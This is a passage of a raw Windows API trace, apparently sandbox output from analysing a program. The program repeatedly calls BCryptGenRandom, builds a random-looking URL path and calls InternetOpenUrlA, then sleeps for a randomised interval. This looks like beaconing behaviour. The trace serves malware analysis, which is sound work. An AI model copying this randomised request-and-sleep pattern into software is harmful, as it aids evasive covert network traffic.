pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16977, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x3a16977) returned 0x0 [0261.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0261.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0261.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.420] GetProcessHeap () returned 0x440000 [0261.420] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0261.420] lstrcpyA (in: lpString1=0x472f30, lpString2="@i¡\x03" | out: lpString1="@i¡\x03") returned="@i¡\x03" [0261.420] lstrcatA (in: lpString1="@i¡\x03", lpString2="/x2rydb7igWu59kq1sobC4q/g7jskar5Mn7rWyrnthgas988qgo7pG/8TdpGkv4zjglhl4vkzo0jhTlupqSACao4mzwxnsmyXfap/" | out: lpString1="@i¡\x03/x2rydb7igWu59kq1sobC4q/g7jskar5Mn7rWyrnthgas988qgo7pG/8TdpGkv4zjglhl4vkzo0jhTlupqSACao4mzwxnsmyXfap/") returned="@i¡\x03/x2rydb7igWu59kq1sobC4q/g7jskar5Mn7rWyrnthgas988qgo7pG/8TdpGkv4zjglhl4vkzo0jhTlupqSACao4mzwxnsmyXfap/" [0261.420] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0261.420] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="@i¡\x03/x2rydb7igWu59kq1sobC4q/g7jskar5Mn7rWyrnthgas988qgo7pG/8TdpGkv4zjglhl4vkzo0jhTlupqSACao4mzwxnsmyXfap/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0261.420] GetProcessHeap () returned 0x440000 [0261.420] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0261.420] GetProcessHeap () returned 0x440000 [0261.421] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16940 | out: hHeap=0x440000) returned 1 [0261.421] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0261.421] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0261.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0261.422] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0261.422] Sleep (dwMilliseconds=0x160a0) [0261.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0261.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.574] GetProcessHeap () returned 0x440000 [0261.574] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5fc0 [0261.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5fc1, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x4d5fc1) returned 0x0 [0261.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0261.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0261.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5fec, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4d5fec) returned 0x0 [0261.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 